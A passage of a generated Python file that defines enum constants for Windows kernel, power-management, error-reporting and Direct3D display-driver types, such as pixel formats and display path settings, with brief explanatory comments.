WINDOW_ARRANGEMENT_COMMAND.WARR_VRESTORE_UP = 12
WINDOW_ARRANGEMENT_COMMAND.WARR_VRESTORE_DOWN = 13
WINDOW_ARRANGEMENT_COMMAND.WARR_VMAXIMIZE_RIGHT = 14
WINDOW_ARRANGEMENT_COMMAND.WARR_VMAXIMIZE_LEFT = 15
WINDOW_ARRANGEMENT_COMMAND.WARR_MOVE_NEXT_MONITOR_LEFT = 16
WINDOW_ARRANGEMENT_COMMAND.WARR_MOVE_NEXT_MONITOR_RIGHT = 17
WINDOW_ARRANGEMENT_COMMAND.WARR_MOVE_LAST = 18
# Object-manager handle-open reasons (passed to open procedures).
OB_OPEN_REASON = v_enum()
OB_OPEN_REASON.ObCreateHandle = 0
OB_OPEN_REASON.ObOpenHandle = 1
OB_OPEN_REASON.ObDuplicateHandle = 2
OB_OPEN_REASON.ObInheritHandle = 3
OB_OPEN_REASON.ObMaxOpenReason = 4
DMM_MODE_PRUNING_ALGORITHM = v_enum()
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_UNINITIALIZED = 0
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_GDI = 1
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_VISTA = 2
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_GDI_VISTA_UNION = 3
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_MAXVALID = 3  # alias of GDI_VISTA_UNION
# Processor access mode (previous mode) for system-call validation.
MODE = v_enum()
MODE.KernelMode = 0
MODE.UserMode = 1
MODE.MaximumMode = 2
POWER_STATE_TYPE = v_enum()
POWER_STATE_TYPE.SystemPowerState = 0
POWER_STATE_TYPE.DevicePowerState = 1
IRQ_PRIORITY = v_enum()
IRQ_PRIORITY.IrqPriorityUndefined = 0
IRQ_PRIORITY.IrqPriorityLow = 1
IRQ_PRIORITY.IrqPriorityNormal = 2
IRQ_PRIORITY.IrqPriorityHigh = 3
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS = v_enum()
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassMinimum = 0
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassLow = 1
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassNormal = 2
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassHigh = 3
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassMaximum = 4
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_MaxAllocationPriorityClass = 5
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN = v_enum()
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_UNINITIALIZED = 0
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_DEFAULTMONITORPROFILE = 1
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_MONITORDESCRIPTOR = 2
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_MONITORDESCRIPTOR_REGISTRYOVERRIDE = 3
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_SPECIFICCAP_REGISTRYOVERRIDE = 4
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_DRIVER = 5
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_MAXVALID = 5  # alias of MCO_DRIVER
D3DKMDT_PIXEL_VALUE_ACCESS_MODE = v_enum()
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_UNINITIALIZED = 0
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_DIRECT = 1
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_PRESETPALETTE = 2
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_SETTABLEPALETTE = 3
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_MAXVALID = 3  # alias of SETTABLEPALETTE
# Only the UNINITIALIZED member is emitted here; other members, if any,
# were not produced by the generator.
D3DKMDT_TEXT_RENDERING_FORMAT = v_enum()
D3DKMDT_TEXT_RENDERING_FORMAT.D3DKMDT_TRF_UNINITIALIZED = 0
# Comparison results used by RTL generic table callbacks.
RTL_GENERIC_COMPARE_RESULTS = v_enum()
RTL_GENERIC_COMPARE_RESULTS.GenericLessThan = 0
RTL_GENERIC_COMPARE_RESULTS.GenericGreaterThan = 1
RTL_GENERIC_COMPARE_RESULTS.GenericEqual = 2
# System power states S0 (working) .. S5 (shutdown).
SYSTEM_POWER_STATE = v_enum()
SYSTEM_POWER_STATE.PowerSystemUnspecified = 0
SYSTEM_POWER_STATE.PowerSystemWorking = 1
SYSTEM_POWER_STATE.PowerSystemSleeping1 = 2
SYSTEM_POWER_STATE.PowerSystemSleeping2 = 3
SYSTEM_POWER_STATE.PowerSystemSleeping3 = 4
SYSTEM_POWER_STATE.PowerSystemHibernate = 5
SYSTEM_POWER_STATE.PowerSystemShutdown = 6
SYSTEM_POWER_STATE.PowerSystemMaximum = 7
D3DKMDT_VIDPN_SOURCE_MODE_TYPE = v_enum()
D3DKMDT_VIDPN_SOURCE_MODE_TYPE.D3DKMDT_RMT_UNINITIALIZED = 0
D3DKMDT_VIDPN_SOURCE_MODE_TYPE.D3DKMDT_RMT_GRAPHICS = 1
D3DKMDT_VIDPN_SOURCE_MODE_TYPE.D3DKMDT_RMT_TEXT = 2
# Return values for driver adapter-control routines; note this enum starts at 1.
IO_ALLOCATION_ACTION = v_enum()
IO_ALLOCATION_ACTION.KeepObject = 1
IO_ALLOCATION_ACTION.DeallocateObject = 2
IO_ALLOCATION_ACTION.DeallocateObjectKeepRegisters = 3
# SEH exception-handler dispositions.
EXCEPTION_DISPOSITION = v_enum()
EXCEPTION_DISPOSITION.ExceptionContinueExecution = 0
EXCEPTION_DISPOSITION.ExceptionContinueSearch = 1
EXCEPTION_DISPOSITION.ExceptionNestedException = 2
EXCEPTION_DISPOSITION.ExceptionCollidedUnwind = 3
D3DKMDT_VIDPN_PRESENT_PATH_SCALING = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_IDENTITY = 1
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_CENTERED = 2
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_STRETCHED = 3
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_ASPECTRATIOCENTEREDMAX = 4
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_CUSTOM = 5
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_RESERVED1 = 253
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_UNPINNED = 254
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_NOTSPECIFIED = 255
D3DDDI_GAMMARAMP_TYPE = v_enum()
D3DDDI_GAMMARAMP_TYPE.D3DDDI_GAMMARAMP_UNINITIALIZED = 0
D3DDDI_GAMMARAMP_TYPE.D3DDDI_GAMMARAMP_DEFAULT = 1
D3DDDI_GAMMARAMP_TYPE.D3DDDI_GAMMARAMP_RGB256x3x16 = 2
D3DDDI_GAMMARAMP_TYPE.D3DDDI_GAMMARAMP_DXGI_1 = 3
SECURITY_OPERATION_CODE = v_enum()
SECURITY_OPERATION_CODE.SetSecurityDescriptor = 0
SECURITY_OPERATION_CODE.QuerySecurityDescriptor = 1
SECURITY_OPERATION_CODE.DeleteSecurityDescriptor = 2
SECURITY_OPERATION_CODE.AssignSecurityDescriptor = 3
WHEA_ERROR_PACKET_DATA_FORMAT = v_enum()
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatIPFSalRecord = 0
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatXPFMCA = 1
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatMemory = 2
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatPCIExpress = 3
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatNMIPort = 4
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatPCIXBus = 5
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatPCIXDevice = 6
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatGeneric = 7
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatMax = 8
# Scan-line ordering for CCD display configs; INTERLACED aliases
# INTERLACED_UPPERFIELDFIRST at 2, and FORCE_UINT32 = -1 is a width sentinel.
DISPLAYCONFIG_SCANLINE_ORDERING = v_enum()
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_UNSPECIFIED = 0
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_PROGRESSIVE = 1
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_INTERLACED = 2
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_INTERLACED_UPPERFIELDFIRST = 2
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_INTERLACED_LOWERFIELDFIRST = 3
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_FORCE_UINT32 = -1
TP_CALLBACK_PRIORITY = v_enum()
TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_HIGH = 0
TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL = 1
TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_LOW = 2
TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_INVALID = 3
SECURITY_IMPERSONATION_LEVEL = v_enum()
SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous = 0
SECURITY_IMPERSONATION_LEVEL.SecurityIdentification = 1
SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation = 2
SECURITY_IMPERSONATION_LEVEL.SecurityDelegation = 3
DEVICE_USAGE_NOTIFICATION_TYPE = v_enum()
DEVICE_USAGE_NOTIFICATION_TYPE.DeviceUsageTypeUndefined = 0
DEVICE_USAGE_NOTIFICATION_TYPE.DeviceUsageTypePaging = 1
DEVICE_USAGE_NOTIFICATION_TYPE.DeviceUsageTypeHibernation = 2
DEVICE_USAGE_NOTIFICATION_TYPE.DeviceUsageTypeDumpFile = 3
D3DKMDT_COLOR_BASIS = v_enum()
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_UNINITIALIZED = 0
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_INTENSITY = 1
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_SRGB = 2
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_SCRGB = 3
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_YCBCR = 4
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_YPBPR = 5
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_MAXVALID = 5  # alias of CB_YPBPR
DXGK_RECOMMENDFUNCTIONALVIDPN_REASON = v_enum()
DXGK_RECOMMENDFUNCTIONALVIDPN_REASON.DXGK_RFVR_UNINITIALIZED = 0
DXGK_RECOMMENDFUNCTIONALVIDPN_REASON.DXGK_RFVR_HOTKEY = 1
DXGK_RECOMMENDFUNCTIONALVIDPN_REASON.DXGK_RFVR_USERMODE = 2
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT = v_enum()
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttempt = 0
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptSuccess = 1
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissNoCommand = 2
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissNotEnabled = 3
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissNextFence = 4
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissPagingCommand = 5
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissSplittedCommand = 6
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissFenceCommand = 7
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissRenderPendingFlip = 8
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissNotMakingProgress = 9
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissLessPriority = 10
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissRemainingQuantum = 11
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissRemainingPreemptionQuantum = 12
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissAlreadyPreempting = 13
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissGlobalBlock = 14
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissAlreadyRunning = 15
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptStatisticsMax = 16
# Hardware bus/interface types; -1 means "undefined".
INTERFACE_TYPE = v_enum()
INTERFACE_TYPE.InterfaceTypeUndefined = -1
INTERFACE_TYPE.Internal = 0
INTERFACE_TYPE.Isa = 1
INTERFACE_TYPE.Eisa = 2
INTERFACE_TYPE.MicroChannel = 3
INTERFACE_TYPE.TurboChannel = 4
INTERFACE_TYPE.PCIBus = 5
INTERFACE_TYPE.VMEBus = 6
INTERFACE_TYPE.NuBus = 7
INTERFACE_TYPE.PCMCIABus = 8
INTERFACE_TYPE.CBus = 9
INTERFACE_TYPE.MPIBus = 10
INTERFACE_TYPE.MPSABus = 11
INTERFACE_TYPE.ProcessorInternal = 12
INTERFACE_TYPE.InternalPowerBus = 13
INTERFACE_TYPE.PNPISABus = 14
INTERFACE_TYPE.PNPBus = 15
INTERFACE_TYPE.Vmcs = 16
INTERFACE_TYPE.MaximumInterfaceType = 17
ALTERNATIVE_ARCHITECTURE_TYPE = v_enum()
ALTERNATIVE_ARCHITECTURE_TYPE.StandardDesign = 0
ALTERNATIVE_ARCHITECTURE_TYPE.NEC98x86 = 1
ALTERNATIVE_ARCHITECTURE_TYPE.EndAlternatives = 2
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_IDENTITY = 1
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_ROTATE90 = 2
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_ROTATE180 = 3
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_ROTATE270 = 4
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_UNPINNED = 254
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_NOTSPECIFIED = 255
WHEA_ERROR_TYPE = v_enum()
WHEA_ERROR_TYPE.WheaErrTypeProcessor = 0
WHEA_ERROR_TYPE.WheaErrTypeMemory = 1
WHEA_ERROR_TYPE.WheaErrTypePCIExpress = 2
WHEA_ERROR_TYPE.WheaErrTypeNMI = 3
WHEA_ERROR_TYPE.WheaErrTypePCIXBus = 4
WHEA_ERROR_TYPE.WheaErrTypePCIXDevice = 5
WHEA_ERROR_TYPE.WheaErrTypeGeneric = 6
DXGK_DIAG_TYPE = v_enum()
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_NONE = 0
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_SDC = 1
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_HPD = 2
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_DC_ORIGIN = 3
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_USER_CDS = 4
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_DRV_CDS = 5
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_CODE_POINT = 6
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_QDC = 7
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_MONITOR_MGR = 8
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_CONNECTEDSET_NOT_FOUND = 9
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_DISPDIAG_COLLECTED = 10
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_BML_PACKET = 11
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_BML_PACKET_EX = 12
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_COMMIT_VIDPN_FAILED = 13
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_DRIVER_RECOMMEND_VIDPN = 14
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_MAX = 14  # alias of the last real type
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_FORCE_UINT32 = -1  # 32-bit-width sentinel
# .NET / CLR COR header constants (COMIMAGE_FLAGS_*, COR_VTABLE_*, etc.);
# a mixed bag of bit flags and plain limits, kept verbatim from corhdr.h.
ReplacesCorHdrNumericDefines = v_enum()
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_ILONLY = 1
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_32BITREQUIRED = 2
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_IL_LIBRARY = 4
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_STRONGNAMESIGNED = 8
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_NATIVE_ENTRYPOINT = 16
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_TRACKDEBUGDATA = 65536
ReplacesCorHdrNumericDefines.COR_VERSION_MAJOR_V2 = 2
ReplacesCorHdrNumericDefines.COR_VERSION_MAJOR = 2
ReplacesCorHdrNumericDefines.COR_VERSION_MINOR = 0
ReplacesCorHdrNumericDefines.COR_DELETED_NAME_LENGTH = 8
ReplacesCorHdrNumericDefines.COR_VTABLEGAP_NAME_LENGTH = 8
ReplacesCorHdrNumericDefines.NATIVE_TYPE_MAX_CB = 1
ReplacesCorHdrNumericDefines.COR_ILMETHOD_SECT_SMALL_MAX_DATASIZE = 255
ReplacesCorHdrNumericDefines.IMAGE_COR_MIH_METHODRVA = 1
ReplacesCorHdrNumericDefines.IMAGE_COR_MIH_EHRVA = 2
ReplacesCorHdrNumericDefines.IMAGE_COR_MIH_BASICBLOCK = 8
ReplacesCorHdrNumericDefines.COR_VTABLE_32BIT = 1
ReplacesCorHdrNumericDefines.COR_VTABLE_64BIT = 2
ReplacesCorHdrNumericDefines.COR_VTABLE_FROM_UNMANAGED = 4
ReplacesCorHdrNumericDefines.COR_VTABLE_FROM_UNMANAGED_RETAIN_APPDOMAIN = 8
ReplacesCorHdrNumericDefines.COR_VTABLE_CALL_MOST_DERIVED = 16
ReplacesCorHdrNumericDefines.IMAGE_COR_EATJ_THUNK_SIZE = 32
ReplacesCorHdrNumericDefines.MAX_CLASS_NAME = 1024
ReplacesCorHdrNumericDefines.MAX_PACKAGE_NAME = 1024
D3DKMDT_MODE_PREFERENCE = v_enum()
D3DKMDT_MODE_PREFERENCE.D3DKMDT_MP_UNINITIALIZED = 0
D3DKMDT_MODE_PREFERENCE.D3DKMDT_MP_PREFERRED = 1
D3DKMDT_MODE_PREFERENCE.D3DKMDT_MP_NOTPREFERRED = 2
D3DKMDT_MODE_PREFERENCE.D3DKMDT_MP_MAXVALID = 2  # alias of MP_NOTPREFERRED
# Pool allocation priorities; the SpecialPool variants are base + 8/9.
EX_POOL_PRIORITY = v_enum()
EX_POOL_PRIORITY.LowPoolPriority = 0
EX_POOL_PRIORITY.LowPoolPrioritySpecialPoolOverrun = 8
EX_POOL_PRIORITY.LowPoolPrioritySpecialPoolUnderrun = 9
EX_POOL_PRIORITY.NormalPoolPriority = 16
EX_POOL_PRIORITY.NormalPoolPrioritySpecialPoolOverrun = 24
EX_POOL_PRIORITY.NormalPoolPrioritySpecialPoolUnderrun = 25
EX_POOL_PRIORITY.HighPoolPriority = 32
EX_POOL_PRIORITY.HighPoolPrioritySpecialPoolOverrun = 40
EX_POOL_PRIORITY.HighPoolPrioritySpecialPoolUnderrun = 41
eTHRESHOLD_MARGIN_DIRECTION = v_enum()
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginTop = 0
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginLeft = 1
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginRight = 2
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginBottom = 3
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginMax = 4
MOVERECT_STYLE = v_enum()
MOVERECT_STYLE.MoveRectKeepPositionAtCursor = 0
MOVERECT_STYLE.MoveRectMidTopAtCursor = 1
MOVERECT_STYLE.MoveRectKeepAspectRatioAtCursor = 2
MOVERECT_STYLE.MoveRectSidewiseKeepPositionAtCursor = 3
D3DDDIFORMAT = v_enum()
D3DDDIFORMAT.D3DDDIFMT_UNKNOWN = 0
D3DDDIFORMAT.D3DDDIFMT_R8G8B8 = 20
D3DDDIFORMAT.D3DDDIFMT_A8R8G8B8 = 21
D3DDDIFORMAT.D3DDDIFMT_X8R8G8B8 = 22
D3DDDIFORMAT.D3DDDIFMT_R5G6B5 = 23
D3DDDIFORMAT.D3DDDIFMT_X1R5G5B5 = 24
D3DDDIFORMAT.D3DDDIFMT_A1R5G5B5 = 25
D3DDDIFORMAT.D3DDDIFMT_A4R4G4B4 = 26
D3DDDIFORMAT.D3DDDIFMT_R3G3B2 = 27
D3DDDIFORMAT.D3DDDIFMT_A8 = 28
D3DDDIFORMAT.D3DDDIFMT_A8R3G3B2 = 29
D3DDDIFORMAT.D3DDDIFMT_X4R4G4B4 = 30
D3DDDIFORMAT.D3DDDIFMT_A2B10G10R10 = 31
D3DDDIFORMAT.D3DDDIFMT_A8B8G8R8 = 32
D3DDDIFORMAT.D3DDDIFMT_X8B8G8R8 = 33
D3DDDIFORMAT.D3DDDIFMT_G16R16 = 34
D3DDDIFORMAT.D3DDDIFMT_A2R10G10B10 = 35
D3DDDIFORMAT.D3DDDIFMT_A16B16G16R16 = 36
D3DDDIFORMAT.D3DDDIFMT_A8P8 = 40
D3DDDIFORMAT.D3DDDIFMT_P8 = 41
D3DDDIFORMAT.D3DDDIFMT_L8 = 50
D3DDDIFORMAT.D3DDDIFMT_A8L8 = 51
D3DDDIFORMAT.D3DDDIFMT_A4L4 = 52
D3DDDIFORMAT.D3DDDIFMT_V8U8 = 60
D3DDDIFORMAT.D3DDDIFMT_L6V5U5 = 61
D3DDDIFORMAT.D3DDDIFMT_X8L8V8U8 = 62
D3DDDIFORMAT.D3DDDIFMT_Q8W8V8U8 = 63
D3DDDIFORMAT.D3DDDIFMT_V16U16 = 64
D3DDDIFORMAT.D3DDDIFMT_W11V11U10 = 65
D3DDDIFORMAT.D3DDDIFMT_A2W10V10U10 = 67
D3DDDIFORMAT.D3DDDIFMT_UYVY = 1498831189
D3DDDIFORMAT.D3DDDIFMT_R8G8_B8G8 = 1195525970
D3DDDIFORMAT.D3DDDIFMT_YUY2 = 844715353
D3DDDIFORMAT.D3DDDIFMT_G8R8_G8B8 = 1111970375
D3DDDIFORMAT.D3DDDIFMT_DXT1 = 827611204
D3DDDIFORMAT.D3DDDIFMT_DXT2 = 844388420
D3DDDIFORMAT.D3DDDIFMT_DXT3 = 861165636
D3DDDIFORMAT.D3DDDIFMT_DXT4 = 877942852
D3DDDIFORMAT.D3DDDIFMT_DXT5 = 894720068
D3DDDIFORMAT.D3DDDIFMT_D16_LOCKABLE = 70
D3DDDIFORMAT.D3DDDIFMT_D32 = 71
D3DDDIFORMAT.D3DDDIFMT_D15S1 = 73
D3DDDIFORMAT.D3DDDIFMT_D24S8 = 75
D3DDDIFORMAT.D3DDDIFMT_D24X8 = 77
D3DDDIFORMAT.D3DDDIFMT_D24X4S4 = 79
D3DDDIFORMAT.D3DDDIFMT_D16 = 80
D3DDDIFORMAT.D3DDDIFMT_D32F_LOCKABLE = 82
D3DDDIFORMAT.D3DDDIFMT_D24FS8 = 83
D3DDDIFORMAT.D3DDDIFMT_D32_LOCKABLE = 84
D3DDDIFORMAT.D3DDDIFMT_S8_LOCKABLE = 85
D3DDDIFORMAT.D3DDDIFMT_S1D15 = 72
D3DDDIFORMAT.D3DDDIFMT_S8D24 = 74
D3DDDIFORMAT.D3DDDIFMT_X8D24 = 76
D3DDDIFORMAT.D3DDDIFMT_X4S4D24 = 78
D3DDDIFORMAT.D3DDDIFMT_L16 = 81
D3DDDIFORMAT.D3DDDIFMT_VERTEXDATA = 100
D3DDDIFORMAT.D3DDDIFMT_INDEX16 = 101
D3DDDIFORMAT.D3DDDIFMT_INDEX32 = 102
D3DDDIFORMAT.D3DDDIFMT_Q16W16V16U16 = 110
D3DDDIFORMAT.D3DDDIFMT_MULTI2_ARGB8 = 827606349
D3DDDIFORMAT.D3DDDIFMT_R16F = 111
D3DDDIFORMAT.D3DDDIFMT_G16R16F = 112
D3DDDIFORMAT.D3DDDIFMT_A16B16G16R16F = 113
D3DDDIFORMAT.D3DDDIFMT_R32F = 114
D3DDDIFORMAT.D3DDDIFMT_G32R32F = 115
D3DDDIFORMAT.D3DDDIFMT_A32B32G32R32F = 116
D3DDDIFORMAT.D3DDDIFMT_CxV8U8 = 117
D3DDDIFORMAT.D3DDDIFMT_A1 = 118
D3DDDIFORMAT.D3DDDIFMT_A2B10G10R10_XR_BIAS = 119
D3DDDIFORMAT.D3DDDIFMT_DXVACOMPBUFFER_BASE = 150
D3DDDIFORMAT.D3DDDIFMT_PICTUREPARAMSDATA = 150
D3DDDIFORMAT.D3DDDIFMT_MACROBLOCKDATA = 151
D3DDDIFORMAT.D3DDDIFMT_RESIDUALDIFFERENCEDATA = 152
D3DDDIFORMAT.D3DDDIFMT_DEBLOCKINGDATA = 153
D3DDDIFORMAT.D3DDDIFMT_INVERSEQUANTIZATIONDATA = 154
D3DDDIFORMAT.D3DDDIFMT_SLICECONTROLDATA = 155
D3DDDIFORMAT.D3DDDIFMT_BITSTREAMDATA = 156
D3DDDIFORMAT.D3DDDIFMT_MOTIONVECTORBUFFER = 157
D3DDDIFORMAT.D3DDDIFMT_FILMGRAINBUFFER = 158
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED9 = 159
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED10 = 160
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED11 = 161
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED12 = 162
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED13 = 163
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED14 = 164
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED15 = 165
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED16 = 166
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED17 = 167
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED18 = 168
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED19 = 169
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED20 = 170
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED21 = 171
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED22 = 172
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED23 = 173
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED24 = 174
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED25 = 175
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED26 = 176
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED27 = 177
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED28 = 178
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED29 = 179
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED30 = 180
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED31 = 181
D3DDDIFORMAT.D3DDDIFMT_DXVACOMPBUFFER_MAX = 181
D3DDDIFORMAT.D3DDDIFMT_BINARYBUFFER = 199
D3DDDIFORMAT.D3DDDIFMT_FORCE_UINT = 2147483647
